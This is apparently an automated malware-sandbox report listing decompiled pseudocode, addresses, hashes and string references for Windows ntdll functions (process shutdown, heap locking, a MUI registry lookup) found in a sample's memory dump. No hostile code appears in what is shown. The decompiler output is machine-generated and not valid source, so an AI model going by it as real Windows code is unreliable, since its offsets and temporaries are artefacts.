                                                                                                                                                                                            Function 33D1D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                            			E33D1D6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x33dcc5e8);
				_t68 = E33D47BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x33de5da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x33de37c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E33D6E692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x33de5dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x33de5da8 = 1;
				if( *0x33de65f0 != 0) {
					_t137 =  *0x33de91f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x33de91e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push("true");
					E33CF4779(_t74, _t118);
				}
				if(( *0x33de391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x33de9234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x33de9234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x33de68c8;
					if( *0x33de68c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							L33D70FC8();
							 *0x33de68c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E33D1D8F0();
					}
					_t68 = E33D1D898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x33de5da0; // 0x3b29050
				L8:
				if(_t129 != 0x33de5d9c) {
					_t18 = _t129 - 0x10; // 0x3b29040
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x3b293c0
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x6fdc9bf0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E33D0DC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E33D0F0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E33D0DCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E33D1D886();
					}
					goto L8;
				}
				_t119 =  *0x33de5b24; // 0x3b02d18
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E33D0DC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x33de5b24; // 0x3b02d18
					E33D0F0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E33D1D88F();
				}
				goto L15;
			}


























                                                                                                                                                                                            0x33d1d6d0
                                                                                                                                                                                            0x33d1d6d2
                                                                                                                                                                                            0x33d1d6d7
                                                                                                                                                                                            0x33d1d6dc
                                                                                                                                                                                            0x33d1d6e3
                                                                                                                                                                                            0x33d1d6ed
                                                                                                                                                                                            0x33d1d810
                                                                                                                                                                                            0x33d1d813
                                                                                                                                                                                            0x33d1d81f
                                                                                                                                                                                            0x33d1d81f
                                                                                                                                                                                            0x33d1d6f3
                                                                                                                                                                                            0x33d1d6f9
                                                                                                                                                                                            0x33d1d6fc
                                                                                                                                                                                            0x33d1d6ff
                                                                                                                                                                                            0x33d1d702
                                                                                                                                                                                            0x33d1d709
                                                                                                                                                                                            0x33d5f0c2
                                                                                                                                                                                            0x33d5f0c2
                                                                                                                                                                                            0x33d1d716
                                                                                                                                                                                            0x33d5f0cd
                                                                                                                                                                                            0x33d5f0e7
                                                                                                                                                                                            0x33d5f0ec
                                                                                                                                                                                            0x33d5f0ec
                                                                                                                                                                                            0x33d1d71c
                                                                                                                                                                                            0x33d1d71f
                                                                                                                                                                                            0x33d1d724
                                                                                                                                                                                            0x33d1d732
                                                                                                                                                                                            0x33d1d86d
                                                                                                                                                                                            0x33d1d873
                                                                                                                                                                                            0x33d1d875
                                                                                                                                                                                            0x33d1d877
                                                                                                                                                                                            0x33d1d879
                                                                                                                                                                                            0x33d1d87f
                                                                                                                                                                                            0x33d1d87f
                                                                                                                                                                                            0x33d1d738
                                                                                                                                                                                            0x33d1d740
                                                                                                                                                                                            0x33d1d742
                                                                                                                                                                                            0x33d1d744
                                                                                                                                                                                            0x33d1d744
                                                                                                                                                                                            0x33d1d750
                                                                                                                                                                                            0x33d5f0f4
                                                                                                                                                                                            0x33d5f0f7
                                                                                                                                                                                            0x33d5f0fe
                                                                                                                                                                                            0x33d5f101
                                                                                                                                                                                            0x33d5f108
                                                                                                                                                                                            0x33d5f10b
                                                                                                                                                                                            0x33d5f10d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f113
                                                                                                                                                                                            0x33d5f117
                                                                                                                                                                                            0x33d1d7ed
                                                                                                                                                                                            0x33d1d7ed
                                                                                                                                                                                            0x33d1d7f3
                                                                                                                                                                                            0x33d1d7fa
                                                                                                                                                                                            0x33d5f13c
                                                                                                                                                                                            0x33d5f13f
                                                                                                                                                                                            0x33d5f145
                                                                                                                                                                                            0x33d5f14a
                                                                                                                                                                                            0x33d5f14a
                                                                                                                                                                                            0x33d5f13f
                                                                                                                                                                                            0x33d1d800
                                                                                                                                                                                            0x33d1d804
                                                                                                                                                                                            0x33d1d806
                                                                                                                                                                                            0x33d1d806
                                                                                                                                                                                            0x33d1d80b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1d80b
                                                                                                                                                                                            0x33d1d756
                                                                                                                                                                                            0x33d1d756
                                                                                                                                                                                            0x33d1d75a
                                                                                                                                                                                            0x33d1d75d
                                                                                                                                                                                            0x33d1d766
                                                                                                                                                                                            0x33d1d76c
                                                                                                                                                                                            0x33d1d76e
                                                                                                                                                                                            0x33d1d76e
                                                                                                                                                                                            0x33d1d771
                                                                                                                                                                                            0x33d1d774
                                                                                                                                                                                            0x33d1d774
                                                                                                                                                                                            0x33d1d777
                                                                                                                                                                                            0x33d1d77a
                                                                                                                                                                                            0x33d1d77a
                                                                                                                                                                                            0x33d1d77d
                                                                                                                                                                                            0x33d1d782
                                                                                                                                                                                            0x33d1d78d
                                                                                                                                                                                            0x33d1d794
                                                                                                                                                                                            0x33d1d799
                                                                                                                                                                                            0x33d1d79f
                                                                                                                                                                                            0x33d1d79f
                                                                                                                                                                                            0x33d1d7a1
                                                                                                                                                                                            0x33d1d7a7
                                                                                                                                                                                            0x33d1d7ac
                                                                                                                                                                                            0x33d1d7af
                                                                                                                                                                                            0x33d1d7b2
                                                                                                                                                                                            0x33d1d7b6
                                                                                                                                                                                            0x33d1d7da
                                                                                                                                                                                            0x33d1d7da
                                                                                                                                                                                            0x33d1d7b8
                                                                                                                                                                                            0x33d1d7b9
                                                                                                                                                                                            0x33d1d7c0
                                                                                                                                                                                            0x33d1d7c5
                                                                                                                                                                                            0x33d1d7cc
                                                                                                                                                                                            0x33d1d7cf
                                                                                                                                                                                            0x33d1d7cf
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1d782
                                                                                                                                                                                            0x33d1d7e1
                                                                                                                                                                                            0x33d1d7e7
                                                                                                                                                                                            0x33d1d7eb
                                                                                                                                                                                            0x33d1d820
                                                                                                                                                                                            0x33d1d827
                                                                                                                                                                                            0x33d1d82c
                                                                                                                                                                                            0x33d1d832
                                                                                                                                                                                            0x33d1d834
                                                                                                                                                                                            0x33d1d83a
                                                                                                                                                                                            0x33d1d83f
                                                                                                                                                                                            0x33d1d842
                                                                                                                                                                                            0x33d1d84a
                                                                                                                                                                                            0x33d1d84f
                                                                                                                                                                                            0x33d1d856
                                                                                                                                                                                            0x33d1d856
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlDebugPrintTimes.NTDLL ref: 33D1D879
                                                                                                                                                                                              • Part of subcall function 33CF4779: RtlDebugPrintTimes.NTDLL ref: 33CF4817
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                            • API String ID: 3446177414-1975516107
                                                                                                                                                                                            • Opcode ID: c242c858fd4ee3e440c80ded7427ce34c8b53a6105bc60cbcca794006bda9ddd
                                                                                                                                                                                            • Instruction ID: 9f6f849b6a10a68d6e5816bce0504f5fef77f922e70b3e49112529d1fff1b3d4
                                                                                                                                                                                            • Opcode Fuzzy Hash: c242c858fd4ee3e440c80ded7427ce34c8b53a6105bc60cbcca794006bda9ddd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A513076E00345CFEB40DFA4D4807ADBBF2BF48704F284159D401AB685D7B4A8A6CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 19%
                                                                                                                                                                                            			E33D1DA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					E33DB9335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E33DAF717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x33de376c; // 0x0
					 *0x33de91e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E33CEB910();
					} else {
						E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E33CEB910("Invalid heap signature for heap at %p", _t93);
					E33CEB910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E33CEB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x33de47a1 = 1;
						asm("int3");
						 *0x33de47a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						L33D8AA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E33D1FEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E33D1BAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E33D1F300(_t92, _t74);
					}
				}
				goto L6;
			}



















                                                                                                                                                                                            0x33d1da2a
                                                                                                                                                                                            0x33d1da35
                                                                                                                                                                                            0x33d5f408
                                                                                                                                                                                            0x33d1da90
                                                                                                                                                                                            0x33d1da96
                                                                                                                                                                                            0x33d1da9b
                                                                                                                                                                                            0x33d5f510
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f51f
                                                                                                                                                                                            0x33d1daa6
                                                                                                                                                                                            0x33d1daa9
                                                                                                                                                                                            0x33d5f537
                                                                                                                                                                                            0x33d5f53f
                                                                                                                                                                                            0x33d5f53f
                                                                                                                                                                                            0x33d5f537
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1daaf
                                                                                                                                                                                            0x33d1daa1
                                                                                                                                                                                            0x33d1daa1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1daa1
                                                                                                                                                                                            0x33d1da42
                                                                                                                                                                                            0x33d5f413
                                                                                                                                                                                            0x33d5f41b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f421
                                                                                                                                                                                            0x33d1da4f
                                                                                                                                                                                            0x33d5f432
                                                                                                                                                                                            0x33d5f451
                                                                                                                                                                                            0x33d5f456
                                                                                                                                                                                            0x33d5f434
                                                                                                                                                                                            0x33d5f449
                                                                                                                                                                                            0x33d5f44e
                                                                                                                                                                                            0x33d5f462
                                                                                                                                                                                            0x33d5f471
                                                                                                                                                                                            0x33d5f476
                                                                                                                                                                                            0x33d5f47b
                                                                                                                                                                                            0x33d5f48d
                                                                                                                                                                                            0x33d5f48f
                                                                                                                                                                                            0x33d5f496
                                                                                                                                                                                            0x33d5f497
                                                                                                                                                                                            0x33d5f497
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f49e
                                                                                                                                                                                            0x33d1da59
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1da5b
                                                                                                                                                                                            0x33d1da66
                                                                                                                                                                                            0x33d1da6d
                                                                                                                                                                                            0x33d1da6d
                                                                                                                                                                                            0x33d1da71
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1da73
                                                                                                                                                                                            0x33d1da77
                                                                                                                                                                                            0x33d1da7f
                                                                                                                                                                                            0x33d1da80
                                                                                                                                                                                            0x33d1da84
                                                                                                                                                                                            0x33d1da8a
                                                                                                                                                                                            0x33d5f4a8
                                                                                                                                                                                            0x33d5f4ab
                                                                                                                                                                                            0x33d5f4ab
                                                                                                                                                                                            0x33d5f4b0
                                                                                                                                                                                            0x33d5f4b3
                                                                                                                                                                                            0x33d5f4b8
                                                                                                                                                                                            0x33d5f4c1
                                                                                                                                                                                            0x33d5f4c1
                                                                                                                                                                                            0x33d5f4c4
                                                                                                                                                                                            0x33d5f4c8
                                                                                                                                                                                            0x33d5f4cb
                                                                                                                                                                                            0x33d5f4ce
                                                                                                                                                                                            0x33d5f4d5
                                                                                                                                                                                            0x33d5f4d8
                                                                                                                                                                                            0x33d5f4db
                                                                                                                                                                                            0x33d5f4e1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f4e7
                                                                                                                                                                                            0x33d5f4ec
                                                                                                                                                                                            0x33d5f4ec
                                                                                                                                                                                            0x33d5f4f0
                                                                                                                                                                                            0x33d5f4f3
                                                                                                                                                                                            0x33d5f4f9
                                                                                                                                                                                            0x33d5f503
                                                                                                                                                                                            0x33d5f503
                                                                                                                                                                                            0x33d5f4f9
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                            • API String ID: 3446177414-3224558752
                                                                                                                                                                                            • Opcode ID: e61b738b02c5170f10962bc4756d4ffc88544f25d789ac5d9a83b238bded958f
                                                                                                                                                                                            • Instruction ID: cdace747aa2c582465451da142ab95b0a7420945915c0c93b15dff2991066ab3
                                                                                                                                                                                            • Opcode Fuzzy Hash: e61b738b02c5170f10962bc4756d4ffc88544f25d789ac5d9a83b238bded958f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 58415875E09741DFEB01DF28C440B6AB7BCFF40721F0486A8E4558F681CB78A991CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 30%
                                                                                                                                                                                            			E33D1DAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E33DB9109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E33DAF2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x33de3768; // 0x0
					 *0x33de91e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E33CEB910();
					} else {
						E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E33CEB910("Invalid heap signature for heap at %p", _t53);
					E33CEB910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E33CEB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x33de47a1 = 1;
						asm("int3");
						 *0x33de47a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E33CFFED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}









                                                                                                                                                                                            0x33d1dac8
                                                                                                                                                                                            0x33d1dacb
                                                                                                                                                                                            0x33d1dad6
                                                                                                                                                                                            0x33d5f54e
                                                                                                                                                                                            0x33d1db0e
                                                                                                                                                                                            0x33d1db14
                                                                                                                                                                                            0x33d1db19
                                                                                                                                                                                            0x33d5f5ee
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f5fd
                                                                                                                                                                                            0x33d1db24
                                                                                                                                                                                            0x33d1db27
                                                                                                                                                                                            0x33d5f614
                                                                                                                                                                                            0x33d5f61c
                                                                                                                                                                                            0x33d5f61c
                                                                                                                                                                                            0x33d5f614
                                                                                                                                                                                            0x33d1db2d
                                                                                                                                                                                            0x33d1db2f
                                                                                                                                                                                            0x33d1db31
                                                                                                                                                                                            0x33d1db31
                                                                                                                                                                                            0x33d1db1f
                                                                                                                                                                                            0x33d1db1f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1db1f
                                                                                                                                                                                            0x33d1dae3
                                                                                                                                                                                            0x33d5f559
                                                                                                                                                                                            0x33d5f561
                                                                                                                                                                                            0x33d5f567
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f567
                                                                                                                                                                                            0x33d1daf0
                                                                                                                                                                                            0x33d5f578
                                                                                                                                                                                            0x33d5f597
                                                                                                                                                                                            0x33d5f59c
                                                                                                                                                                                            0x33d5f57a
                                                                                                                                                                                            0x33d5f58f
                                                                                                                                                                                            0x33d5f594
                                                                                                                                                                                            0x33d5f5a8
                                                                                                                                                                                            0x33d5f5b7
                                                                                                                                                                                            0x33d5f5bc
                                                                                                                                                                                            0x33d5f5c1
                                                                                                                                                                                            0x33d5f5d3
                                                                                                                                                                                            0x33d5f5d5
                                                                                                                                                                                            0x33d5f5dc
                                                                                                                                                                                            0x33d5f5dd
                                                                                                                                                                                            0x33d5f5dd
                                                                                                                                                                                            0x33d5f5e4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1daf6
                                                                                                                                                                                            0x33d1dafa
                                                                                                                                                                                            0x33d1db02
                                                                                                                                                                                            0x33d1db07
                                                                                                                                                                                            0x33d1db07
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1dafa

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                            • API String ID: 3446177414-1222099010
                                                                                                                                                                                            • Opcode ID: 2c0d5760960494c80b6afd217d7b874f232182d77e121639cbbcbbddc352a9d3
                                                                                                                                                                                            • Instruction ID: c5ca555b1290178363cbfbae051bb51049aeebc275de33d09fccfa052a14aca9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c0d5760960494c80b6afd217d7b874f232182d77e121639cbbcbbddc352a9d3
                                                                                                                                                                                            • Instruction Fuzzy Hash: ED313576906BC4DFEB52EF28C508B6A77F8EB01B50F050584F4928FA92CB79E941CB51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CED02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                            			E33CED02D(void* __ecx, intOrPtr* __edx, intOrPtr _a4) {
				char* _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v140;
				signed int _v144;
				char _v145;
				char _v148;
				signed int _v152;
				void* _v156;
				void* _v157;
				signed int _v160;
				void* _v161;
				signed int _v164;
				signed int _v168;
				void* _v172;
				void* _v180;
				void* _v188;
				intOrPtr _t111;
				void* _t128;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr* _t179;
				void* _t182;
				char _t184;
				signed int _t185;
				void* _t187;
				void* _t196;

				_t187 = (_t185 & 0xfffffff8) - 0x9c;
				_t160 = __ecx;
				_t179 = __edx;
				_v128 = 0;
				_v160 = 0;
				_v144 = 0;
				_v152 = 0;
				if(__edx == 0 || _a4 == 0) {
					_t182 = 0xc000000d;
					goto L11;
				} else {
					_v128 =  *__edx;
					E33D35050(__ecx,  &_v140, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
					_t184 = 0x18;
					_v132 = _t184;
					_v124 =  &_v148;
					_v128 = 0;
					_push( &_v132);
					_push(0x20019);
					_v120 = 0x40;
					_push( &_v168);
					_v116 = 0;
					_v112 = 0;
					if(L33D32AB0() >= 0) {
						_t182 = L33DAADD6(_v160, _a4,  &_v145,  &_v132);
						if(_t182 >= 0) {
							L11:
							if(_v160 != 0) {
								_push(_v160);
								L33D32A80();
							}
							if(_v144 != 0) {
								_push(_v144);
								L33D32A80();
							}
							if(_v152 != 0) {
								_push(_v152);
								L33D32A80();
							}
							if(_t182 < 0) {
								if(_t179 == 0) {
									goto L19;
								}
								_t162 = _v128;
								if( *_t179 == _t162) {
									goto L19;
								}
								if( *_t179 != 0) {
									E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t179);
								}
								goto L44;
							} else {
